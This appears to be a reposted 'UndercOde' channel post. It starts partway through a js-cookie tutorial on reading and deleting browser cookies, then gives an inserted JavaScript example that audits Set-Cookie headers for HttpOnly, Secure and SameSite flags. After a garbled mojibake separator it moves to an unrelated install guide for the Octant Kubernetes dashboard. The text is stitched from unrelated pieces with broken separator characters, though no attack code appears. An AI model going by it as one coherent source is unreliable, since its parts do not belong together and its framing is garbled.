Cookies.get() // => { name: 'value' }
Note: It is not possible to read a particular cookie by passing one of the cookie attributes (which may or may not have been used when writing the cookie in question):
Cookies.get('foo', { domain: 'sub.example.com' }) // domain won't have any effect...!
8) The cookie with the name foo will only be available on .get() if it's visible from where the code is called; the domain and/or path attribute will not have an effect when reading.
9) Delete cookie:
Cookies.remove('name')
10) Delete a cookie valid to the path of the current page:
Cookies.set('name', 'value', { path: '' })
Cookies.remove('name') // fail!
Cookies.remove('name', { path: '' }) // removed!
> IMPORTANT! When deleting a cookie and you're not relying on the default attributes, you must pass the exact same path and domain attributes that were used to set the cookie:
Cookies.remove('name', { path: '', domain: '.yourdomain.com' })
USE FOR LEARNING ONLY
Written by UndercOde
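Cookies.get() in step 7 returns only the cookies that page script can see, so a session cookie issued with HttpOnly never appears there. As an added example (not js-cookie code and not from the original post), the functions below audit Set-Cookie response headers for the attributes that keep a cookie away from script, plaintext HTTP and cross-site requests; the header values and the names `parseSetCookie`, `auditSetCookie` and `auditResponse` are constructed.

```javascript
// Added example (not js-cookie code and not from the original post): audit
// Set-Cookie headers for the attributes that decide whether page script,
// such as Cookies.get(), can read a cookie. Sample headers are constructed.

// Split one Set-Cookie header into name, value and lower-cased attributes.
function parseSetCookie(header) {
  const parts = header.split(";").map((p) => p.trim()).filter(Boolean);
  const first = parts.shift() || "";
  const eq = first.indexOf("=");
  const name = eq === -1 ? "" : first.slice(0, eq).trim();
  const value = eq === -1 ? first : first.slice(eq + 1).trim();
  const attrs = Object.create(null); // no inherited keys such as "constructor"
  for (const part of parts) {
    const i = part.indexOf("=");
    const key = (i === -1 ? part : part.slice(0, i)).trim().toLowerCase();
    // Flag attributes (Secure, HttpOnly) carry no value; store true for them.
    attrs[key] = i === -1 ? true : part.slice(i + 1).trim() || true;
  }
  return { name, value, attrs };
}

// Return the findings for one header. Cookies that script legitimately needs
// to read (UI preferences, for example) can be exempted from the HttpOnly check.
function auditSetCookie(header, { scriptReadable = [] } = {}) {
  const { name, attrs } = parseSetCookie(header);
  const findings = [];
  const secure = Boolean(attrs.secure);
  if (!attrs.httponly && !scriptReadable.includes(name)) {
    findings.push("no HttpOnly: value is exposed to document.cookie and Cookies.get()");
  }
  if (!secure) findings.push("no Secure: cookie is also sent over plain HTTP");
  const sameSite =
    typeof attrs.samesite === "string" ? attrs.samesite.toLowerCase() : "";
  if (!["strict", "lax", "none"].includes(sameSite)) {
    findings.push("no valid SameSite: the browser default applies");
  } else if (sameSite === "none" && !secure) {
    findings.push("SameSite=None requires Secure");
  }
  if (name.startsWith("__Host-") &&
      (!secure || attrs.path !== "/" || "domain" in attrs)) {
    findings.push("__Host- prefix needs Secure, Path=/ and no Domain");
  }
  if (name.startsWith("__Secure-") && !secure) {
    findings.push("__Secure- prefix needs Secure");
  }
  return { name, findings };
}

// Audit every Set-Cookie header of a response; keep only cookies with findings.
function auditResponse(headers, options) {
  return headers
    .map((h) => auditSetCookie(h, options))
    .filter((r) => r.findings.length > 0);
}

// Constructed sample headers.
const SAMPLE_HEADERS = [
  "sid=abc123; Path=/",
  "__Host-sid=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",
  "theme=dark; Path=/; Secure; SameSite=Lax",
  "track=1; SameSite=None",
  "__Host-pref=1; Domain=example.test; Secure; HttpOnly; SameSite=Strict",
];

for (const r of auditResponse(SAMPLE_HEADERS, { scriptReadable: ["theme"] })) {
  console.log(r.name, "->", r.findings.join("; "));
}
```

A cookie written with Cookies.set() can never carry HttpOnly, because that attribute can only be set by the server in a Set-Cookie header, so session identifiers should not be created from page script.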
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
🦑2019 new update: Octant is a great tool for developers to understand how applications run on a Kubernetes cluster. It aims to be part of the developer's toolkit for gaining insight and approaching complexity found in Kubernetes. Octant offers a combination of introspective tooling, cluster navigation, and object management along with a plugin system to further extend its capabilities.
instagram.com/UndercOdeTestingCompany
🦑INSTALLATION & RUN:
On any Debian-based OS (Kali/Parrot...):
1) Download https://github.com/vmware-tanzu/octant/releases/download/v0.9.1/octant_0.9.1_Linux-64bit.deb
2) cd Downloads
3) dpkg -i (name of downloaded file)
🦑For Windows:
1) Install using Chocolatey with the following one-liner:
> choco install octant --confirm
2) Scoop: add the extras bucket.
> download https://github.com/lukesampson/scoop-extras
+ cmd run :
> scoop bucket add extras
3) Install using Scoop:
> scoop install octant
🦑macOS:
> brew install octant
🦑If you download the archive from the release page:
> https://github.com/vmware-tanzu/octant/releases
1) tar -xzvf ~/Downloads/octant_0.X.Y_Linux-64bit.tar.gz
(this extracts octant_0.X.Y_Linux-64bit/README.md and octant_0.X.Y_Linux-64bit/octant)
2) Verify it runs:
> ./octant_0.X.Y_Linux-64bit/octant version
🦑Tested by UndercOde:
> Ubuntu
@Mr. BOTNET (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ